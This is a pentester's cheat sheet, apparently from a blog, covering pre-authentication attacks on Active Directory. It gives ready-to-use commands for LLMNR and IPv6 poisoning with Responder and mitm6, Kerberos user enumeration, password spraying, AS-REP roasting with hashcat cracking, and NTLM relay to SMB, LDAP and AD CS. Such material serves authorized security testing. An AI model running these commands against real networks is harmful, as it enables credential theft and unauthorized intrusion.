Pre-Authentication Attacks (No Credentials)

Everything in this section is possible with only network access and no valid domain credentials.

This phase is about:

  • identifying valid users
  • finding weak authentication paths
  • forcing or harvesting authentication
  • setting up relay opportunities

I want to leave this phase with something reusable:
a password, a hash, a ticket, or a confirmed misconfiguration.


Mental Checklist

Before touching anything:

  • Can I enumerate users without auth?
  • Is name resolution trusted?
  • Is Kerberos configured properly?
  • Is NTLM in use?
  • Are there relayable services?

Name Resolution Poisoning (LLMNR / NBT-NS / mDNS)

If legacy name resolution is enabled, I can poison requests and force authentication.

Common Tools

  • responder
  • inveigh (Windows)
  • impacket-ntlmrelayx

Basic Responder

1
responder -I eth0 -dwPv

What I Watch For

  • Incoming NTLM authentication
  • Machine accounts authenticating automatically
  • Service accounts leaking creds

Captured output:

  • NTLMv2 hashes
  • Cleartext (rare, but happens)
  • Relayable authentication

IPv6 Abuse (mitm6 / DHCPv6)

If IPv6 is enabled but unmanaged, this often works instantly.

Basic mitm6 Setup

1
mitm6 -i eth0 -d <domain>

Pair With NTLM Relay

1
impacket-ntlmrelayx -6 -t ldap://<DC_IP> -wh fakewpad.<domain>

Possible outcomes:

  • LDAP relay
  • AD CS enrollment
  • Group modification
  • Shadow credentials

Kerberos User Enumeration

Kerberos tells you if a user exists.

Kerbrute (Username Enumeration)

1
kerbrute userenum -d <domain> --dc <DC_IP> users.txt

Results:

  • Valid users
  • Disabled accounts
  • Accounts requiring pre-auth

This saves me from blind spraying later.


Password Spraying (Pre-Auth)

This is controlled and slow.

Kerberos Spray (Safe)

1
kerbrute passwordspray -d <domain> --dc <DC_IP> users.txt 'Password123!'

NTLM Spray (SMB)

1
nxc smb <DC_IP> -u users.txt -p 'Password123!' --no-bruteforce

Rules I follow:

  • One password per round
  • Respect lockout policy
  • Wait between sprays

AS-REP Roasting (No Preauth)

Accounts with pre-auth disabled leak crackable material.

Identify & Request AS-REP

1
GetNPUsers.py <domain>/ -dc-ip <DC_IP> -no-pass

With known users:

1
GetNPUsers.py <domain>/ -dc-ip <DC_IP> -usersfile users.txt -no-pass

Crack Offline

1
hashcat -m 18200 asrep.hash rockyou.txt

This is high-value and very low-noise.


NTLM Relay (Pre-Auth Context)

Relay turns authentication into access.

SMB Relay (Signing Disabled)

1
impacket-ntlmrelayx -t smb://<TARGET>

LDAP Relay

1
impacket-ntlmrelayx -t ldap://<DC_IP>

AD CS Relay

1
impacket-ntlmrelayx -t https://<CA_SERVER>/certsrv/certfnsh.asp

Relay paths define what escalation options I’ll have later.


Quick Pre-Auth Flow I Actually Use

  1. Kerberos user enum
  2. AS-REP roasting
  3. Password spray (carefully)
  4. Poisoning (Responder / mitm6)
  5. Relay testing

I stop early if I get a valid credential.


Common Pitfalls

  • Spraying too aggressively
  • Ignoring lockout policy
  • Capturing hashes without checking relay paths
  • Running Responder blindly in monitored networks

Notes to Self

  • Pre-auth is about leverage, not speed
  • If this phase is locked down, the domain is usually hardened elsewhere
  • One clean credential beats 100 noisy attempts

Next: Authenticated Enumeration


Comments